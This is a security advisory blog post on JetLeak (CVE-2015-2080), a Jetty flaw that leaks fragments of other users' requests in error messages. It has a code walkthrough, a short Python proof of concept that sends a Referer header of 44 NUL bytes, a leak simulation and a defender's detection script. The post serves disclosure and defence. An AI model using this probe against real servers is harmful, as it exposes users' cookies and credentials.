JetLeak Vulnerability: Remote Leakage of Shared Buffers in Jetty Web Server (CVE-2015-2080)
By Blog
On [2015-02-25] at 08:08:27



Description:

Overview
--------

GDS discovered a critical information leakage vulnerability in the Jetty web server that allows an unauthenticated remote attacker to read arbitrary data from previous requests submitted to the server by other users. I know that sentence is a mouthful, so take a brief moment to digest it, or simply keep reading to understand what that means.

Simply put, if you're running a vulnerable version of the Jetty web server, this can lead to the compromise of sensitive data, including data passed within headers (e.g. cookies, authentication tokens, anti-CSRF tokens, etc.), as well as data passed in the POST body (e.g. usernames, passwords, authentication tokens, CSRF tokens, PII, etc.). GDS also observed this data leakage vulnerability with responses as well, but for brevity this blog post will concentrate on requests.

The root cause of this vulnerability can be traced to exception handling code that returns approximately 16 bytes of data from a shared buffer when illegal characters are submitted in header values to the server. An attacker can exploit this behavior by submitting carefully crafted requests containing variable-length strings of illegal characters to trigger the exception and offset into the shared buffer. Since the shared buffer contains user-submitted data from previous requests, the Jetty server will return specific data chunks (approximately 16 bytes in length) from that user's request, depending on the attacker's payload offset.

Am I vulnerable?
----------------

This vulnerability affects versions 9.2.3 to 9.2.8. GDS also found that beta releases and later, including the beta releases of 9.3.x, are vulnerable. We have created a simple Python script that can be used to determine if a Jetty HTTP server is vulnerable. The script can be downloaded from the GDS GitHub repository below:

https://github.com/GDSSecurity/Jetleak-Testing-Script

Walkthrough of Vulnerable Code
------------------------------

When the Jetty web server receives an HTTP request, the code below is used to parse the HTTP headers and their associated values. This walkthrough will focus primarily on the parsing of the header values. The server begins by looping through each character of a given header value and checks the following:

- On line 1164, the server checks if the character is printable ASCII or not a valid ASCII character.
- On line 1172, the server checks if the character is a space or tab.
- On line 1175, the server checks if the character is a line feed.

If the character is non-printable ASCII (i.e. less than 0x20), then all of the checks above are skipped over and the code throws an IllegalCharacter exception on line 1186, passing in the illegal character and the shared buffer.

File: jetty-http/src/main/java/org/eclipse/jetty/http/HttpParser.java

    920  protected boolean parseHeaders(ByteBuffer buffer)
    921  {
         ... snip ...
    1163     case HEADER_VALUE:
    1164         if (ch>HttpTokens.SPACE || ch<0)
         ... lines 1165-1177 are not reproduced on this page ...
    1178             {
    1179                 _value=null;
    1180                 _valueString=(_valueString==null)?takeString():(_valueString+" "+takeString());
    1181             }
    1182             setState(State.HEADER);
    1183             break;
    1184         }
    1185
    1186         throw new IllegalCharacter(ch,buffer);

In the definition of IllegalCharacter, the server returns an error message. The error message is a format string composed of the illegal character, a static string that represents whether the exception occurred in the header name or header value, and finally a String that outputs some content of the shared buffer via a call to BufferUtil.toDebugString().

File: jetty-http/src/main/java/org/eclipse/jetty/http/HttpParser.java

    1714 private class IllegalCharacter extends BadMessage
    1715 {
    1716     IllegalCharacter(byte ch,ByteBuffer buffer)
    1717     {
    1718         super(String.format("Illegal character 0x%x in state %s in '%s'",ch,_state,BufferUtil.toDebugString(buffer)));
    1719     }
    1720 }

In the toDebugString() method, there is a call to appendDebugString(), which accepts a StringBuilder object as its first parameter and the shared buffer object as the second parameter. The StringBuilder object will be populated by the appendDebugString() method and ultimately returned to the user.

File: jetty-util/src/main/java/org/eclipse/jetty/util/BufferUtil.java

    963  public static String toDebugString(ByteBuffer buffer)
    964  {
    965      if (buffer==null)
    966          return "null";
    967      StringBuilder buf = new StringBuilder();
    968      appendDebugString(buf,buffer);
    969      return buf.toString();
    970  }

Since the shared buffer contains data from previous requests, in order for the attacker to retrieve specific data in the shared buffer, their goal is to create a long enough string of illegal characters to overwrite non-important data in the previous request up until the data the attacker wants (e.g. cookies, authentication tokens, etc.). When the code on line 996 executes, the server reads 16 bytes from the shared buffer before appending "...". Since the attacker has already offset into the previous request via an appropriately long string of illegal characters, these 16 bytes should contain sensitive user data from a previous user's request.

File: jetty-util/src/main/java/org/eclipse/jetty/util/BufferUtil.java

    972  private static void appendDebugString(StringBuilder buf,ByteBuffer buffer)
    973  {
         ... snip ...
         // lines 984-987 and 997-999 are illegible on this page; shown here as in the Jetty 9.2.x source
    983      buf.append("<<<");
    984      for (int i=buffer.position();i<buffer.limit();i++)
    985      {
    986          appendContentChar(buf,buffer.get(i));
    987          if (i==buffer.position()+16 && buffer.limit()>buffer.position()+32)
    988          {
    989              buf.append("...");
    990              i=buffer.limit()-16;
    991          }
    992      }
    993      buf.append(">>>");
    994      int limit=buffer.limit();
    995      buffer.limit(buffer.capacity());
    996      for (int i=limit;i<buffer.capacity();i++)
    997      {
    998          appendContentChar(buf,buffer.get(i));
    999          if (i==limit+16 && buffer.capacity()>limit+32)
    1000         {
    1001             buf.append("...");
    1002             i=buffer.capacity()-16;
    1003         }
    1004     }
    1005     buffer.limit(limit);
    1006 }

Additional places where IllegalCharacter is called in the 9.2.x codebase (line numbers may differ):

- jetty.project-jetty-9.2.x/jetty-http/src/main/java/org/eclipse/jetty/http/HttpParser.java:401
- jetty.project-jetty-9.2.x/jetty-http/src/main/java/org/eclipse/jetty/http/HttpParser.java:530
- jetty.project-jetty-9.2.x/jetty-http/src/main/java/org/eclipse/jetty/http/HttpParser.java:547
- jetty.project-jetty-9.2.x/jetty-http/src/main/java/org/eclipse/jetty/http/HttpParser.java:1161
- jetty.project-jetty-9.2.x/jetty-http/src/main/java/org/eclipse/jetty/http/HttpParser.java:1215

The section below provides a walkthrough of how a malicious user could exploit this vulnerability to read sensitive data from another user's HTTP requests (e.g. cookies, authentication headers, credentials or sensitive data submitted within URLs or POST data).

Exploit Walkthrough
-------------------

Step 1:

The HTTP request below represents a sample request sent by a victim to the Jetty web server (version 9.2.7.v20150116). Notice the Cookie and POST body parameters sent to the server, since these will be the values targeted within our proof of concept.

Reproduction Request (VICTIM):

    POST /test-spec/test HTTP/1.1
    Host: 192.168.56.101:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64; rv:35.0) Gecko/20100101
    Cookie: password=secret
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.56.101:8080/test-spec
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 13

    param1=test

Reproduction Response (VICTIM):

    HTTP/1.1 200 OK
    Set-Cookie: visited=yes;Expires=Thu, 01 Jan 1970 00:00:00 GMT
    Content-Type: text/html
    Server: Jetty(9.2.7.v20150116)
    Content-Length: 3460

Step 2:

As the attacker, craft a request to the same endpoint, but remove the contents of the Referer header and replace it with a string of illegal characters. In this particular case, the string contains 44 null bytes.
One could conceivably use any non-ASCII character less than 0x20 (other than line feed, since the code handles it specially). Note that the process of figuring out the correct length of the illegal character string is an iterative one. The suggestion is to start with a small string and work towards a larger string. If the attacker starts with too large a string, they risk overwriting sensitive data from the previous request. Ideally, the attacker wants to overwrite data in the previous request up until the beginning of the sensitive data. The code will then read 16 bytes of sensitive data and return it to the attacker.

    # Python 2 proof of concept from the write-up: a POST whose Referer value is 44 NUL bytes
    import httplib, urllib

    conn = httplib.HTTPConnection("127.0.0.1:8080")
    headers = {"Referer": chr(0)*44}
    conn.request("POST", "/test-spec/test", "", headers)
    r1 = conn.getresponse()
    print r1.status, r1.reason

Step 3:

Once the script is run and the malicious payload is sent to the server, the attacker should receive a response similar to the one below. Notice that the cookie value is contained within the response. Since it is conceivable that the attacker may want to obtain a value greater than 16 bytes in length, the script above can be run multiple times to get additional 16-byte chunks from the buffer.

Step 4:

To read the POST body parameters, the attacker can modify the length of the illegal character string to offset further into the shared buffer, as shown below.

Remediation
-----------

Currently, if you are running one of the vulnerable Jetty web server versions, Jetty recommends that you upgrade to version 9.2.9.v20150224 immediately. Organizations should also be aware that Jetty may be bundled within third-party products. We recommend referring to the Jetty Powered website for a (not exhaustive) list of products that utilize Jetty. Due to Jetty being a fairly lightweight HTTP server, it is also commonly used by a variety of embedded systems. Organizations should contact any vendors that may be running a Jetty web server in order to determine if their products are vulnerable and when any patches to resolve this vulnerability will be made available.

Disclosure Timeline
-------------------

- Feb 19, 2015 - Vulnerability report sent to security@eclipse.org using SendSafely
- Feb 23, 2015 - Jetty team downloads the vulnerability report
- Feb 24, 2015 - Jetty team releases HTTP Server v9.2.9.v20150224 with bug fix and publicly discloses vulnerability with exploit code
- Feb 25, 2015 - GDS publicly discloses vulnerability

GDS commends the Jetty development team on their timely response and swift remediation. It should be noted that the decision to publicly disclose the vulnerability was made by the Jetty development team, independent of GDS. The GDS blog post was published after it was discovered that Jetty had publicly disclosed the vulnerability.
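To make the buffer walk in the code walkthrough concrete, here is an added Python model (not code from the GDS post or from Jetty) of the appendDebugString loop over a buffer that is reused between requests; the buffer size, the victim request and the padding lengths are constructed for illustration.

```python
# Added example (not from the GDS post or the Jetty code base): a Python model
# of the third loop of BufferUtil.appendDebugString over a buffer that is reused
# between requests, to show which bytes of the previous request end up in the
# IllegalCharacter message. Buffer size, requests and offsets are constructed.

CAPACITY = 256  # assumed size of the pooled ByteBuffer in this model

# Constructed victim request, laid out as it would sit in the buffer.
VICTIM = (
    b"POST /test-spec/test HTTP/1.1\r\n"
    b"Host: 192.168.56.101:8080\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Cookie: password=secret\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 11\r\n"
    b"\r\n"
    b"param1=test"
)


def debug_tail(buf, limit):
    """What appendDebugString emits for the region limit..capacity.

    Mirrors the Java loop on lines 996-1004: it copies bytes one by one and,
    once i reaches limit+16 (17 bytes copied), appends "..." and skips to the
    last 16 bytes. That is why the leak arrives in roughly 16-byte chunks.
    """
    out = bytearray()
    cap = len(buf)
    i = limit
    while i < cap:
        out.append(buf[i])
        if i == limit + 16 and cap > limit + 32:
            out += b"..."
            i = cap - 16
        i += 1
    return bytes(out)


def attacker_request(padding):
    """Constructed request whose Referer value is `padding` NUL bytes."""
    return (
        b"POST /test-spec/test HTTP/1.1\r\n"
        b"Host: 192.168.56.101:8080\r\n"
        b"Referer: " + b"\x00" * padding + b"\r\n"
    )


def leaked_chunk(padding, victim=VICTIM, capacity=CAPACITY):
    """Simulate one round: the victim's request fills the shared buffer, then
    the attacker's shorter request is written over its start. The parser throws
    at the first NUL and the message reveals bytes from limit (the end of the
    attacker's data) onward, i.e. whatever the previous request left there."""
    buf = bytearray(capacity)
    buf[:len(victim)] = victim
    req = attacker_request(padding)
    buf[:len(req)] = req
    limit = len(req)
    # The chunk before "..." is the part the write-up calls "16 bytes".
    return debug_tail(buf, limit).split(b"...")[0]


if __name__ == "__main__":
    for n in (0, 22):
        print(n, leaked_chunk(n))
```

Lengthening the padding moves `limit` forward through the stale request, which is the iterative offsetting Step 2 describes.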
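As an added defender-side example (not GDS's testing script and not Jetty code), the following Python derives two checks from the advisory: a Server-header test for the affected 9.2.3 to 9.2.8 range, and a scan of raw requests for header values carrying bytes below 0x20; the sample Server strings and requests are constructed.

```python
# Added example (not GDS's testing script and not Jetty code): two checks a
# defender can run from the facts in this write-up. is_affected_release()
# matches the Server header against the 9.2.3 - 9.2.8 range;
# illegal_header_values() flags requests whose header values carry the
# trigger, bytes below 0x20 other than HT. Samples below are constructed.
import re

AFFECTED_MIN = (9, 2, 3)
AFFECTED_MAX = (9, 2, 8)
SERVER_RE = re.compile(r"Jetty\((\d+)\.(\d+)\.(\d+)")


def jetty_version(server_header):
    """'Jetty(9.2.7.v20150116)' -> (9, 2, 7); None if the header is not Jetty's."""
    m = SERVER_RE.search(server_header)
    return tuple(int(x) for x in m.groups()) if m else None


def is_affected_release(server_header):
    """True when the advertised Jetty release is within 9.2.3..9.2.8.
    The write-up also lists 9.3.x betas as vulnerable; they fall outside this
    numeric range and are deliberately not matched here."""
    v = jetty_version(server_header)
    return v is not None and AFFECTED_MIN <= v <= AFFECTED_MAX


def illegal_header_values(raw_request):
    """Return [(header name, number of illegal bytes)] for each header whose
    value holds a byte < 0x20 that is not HT (0x09). CR/LF only terminate
    lines, so after splitting they never appear inside a value. The count is
    the length of the offset string the probe used (44 in the write-up)."""
    head = raw_request.split(b"\r\n\r\n", 1)[0]
    findings = []
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(b":")
        if not sep:
            continue
        bad = sum(1 for b in value if b < 0x20 and b != 0x09)
        if bad:
            findings.append((name.strip().decode("ascii", "replace"), bad))
    return findings


# Constructed samples: a normal request and a JetLeak-style probe.
BENIGN = (
    b"POST /test-spec/test HTTP/1.1\r\n"
    b"Host: 192.168.56.101:8080\r\n"
    b"Referer: http://192.168.56.101:8080/test-spec\r\n"
    b"Content-Length: 11\r\n\r\nparam1=test"
)
PROBE = (
    b"POST /test-spec/test HTTP/1.1\r\n"
    b"Host: 192.168.56.101:8080\r\n"
    b"Referer: " + b"\x00" * 44 + b"\r\n\r\n"
)

if __name__ == "__main__":
    print(is_affected_release("Jetty(9.2.7.v20150116)"))  # affected
    print(is_affected_release("Jetty(9.2.9.v20150224)"))  # fixed release
    print(illegal_header_values(PROBE), illegal_header_values(BENIGN))
```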